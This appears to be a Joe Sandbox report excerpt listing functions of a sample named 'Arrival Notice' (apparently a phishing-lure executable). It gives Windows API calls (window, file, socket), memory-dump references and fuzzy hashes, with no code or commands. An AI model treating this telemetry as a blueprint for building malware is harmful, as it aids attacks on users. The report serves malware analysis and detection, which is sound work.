Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9

Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00449A4A
ScreenToClient.USER32(?,?), ref: 00449A80
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98

Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(00000000,?), ref: 0044169A
GetWindowRect.USER32(?,?), ref: 00441722
PtInRect.USER32(?,?,?), ref: 00441734
MessageBeep.USER32(00000000), ref: 004417AD

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94

Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
GetLastError.KERNEL32(?,00000000), ref: 0045D26C
DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94

Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
__isleadbyte_l.LIBCMT ref: 004208A6
MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98

Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004503C8
DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Proc$Parent
String ID:
API String ID: 2351499541-0
Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769

Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
TranslateMessage.USER32(?), ref: 00442B01
DispatchMessageW.USER32(?), ref: 00442B0B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769

Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?), ref: 0047439C

Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2

GetCaretPos.USER32(?), ref: 004743B2
ClientToScreen.USER32(00000000,?), ref: 004743E8
GetForegroundWindow.USER32 ref: 004743EE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5

Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636

SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
_wcslen.LIBCMT ref: 00449519
_wcslen.LIBCMT ref: 00449526

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend_wcslen$_wcspbrk
String ID:
API String ID: 2886238975-0
Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799

Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 004688B1
_fprintf.LIBCMT ref: 00468907
OutputDebugStringW.KERNEL32(00000000,?,00000000,?,?), ref: 0046891F
__setmode.LIBCMT ref: 00468950

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __setmode$DebugOutputString_fprintf
String ID:
API String ID: 1792727568-0
Opcode ID: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
Opcode Fuzzy Hash: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB

Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1

GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC

Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78

lstrlenW.KERNEL32(?), ref: 00434CF6

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64

Strings

cdecl, xrefs: 00434D5A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen$_malloc
String ID: cdecl
API String ID: 3850814276-3896280584
Opcode ID: 37a567b240226cbd2baa50f9abe85d2c250fbd9e026a126a46b873b91be0fe80
Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
Opcode Fuzzy Hash: 37a567b240226cbd2baa50f9abe85d2c250fbd9e026a126a46b873b91be0fe80
Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9

Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661

gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
WSAGetLastError.WSOCK32(00000000), ref: 0046D439
_memmove.LIBCMT ref: 0046D475
inet_ntoa.WSOCK32(?), ref: 0046D481

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
String ID:
API String ID: 2502553879-0
Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5

Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00448C69
GetWindowLongW.USER32(?,000000EC), ref: 00448C91
SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755

Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
WSAGetLastError.WSOCK32(00000000), ref: 00458B03

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94

Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0

Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
GetStockObject.GDI32(00000011), ref: 00430258
SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
ShowWindow.USER32(00000000,00000000), ref: 0043027D

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$CreateMessageObjectSendShowStock
String ID:
API String ID: 1358664141-0
Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
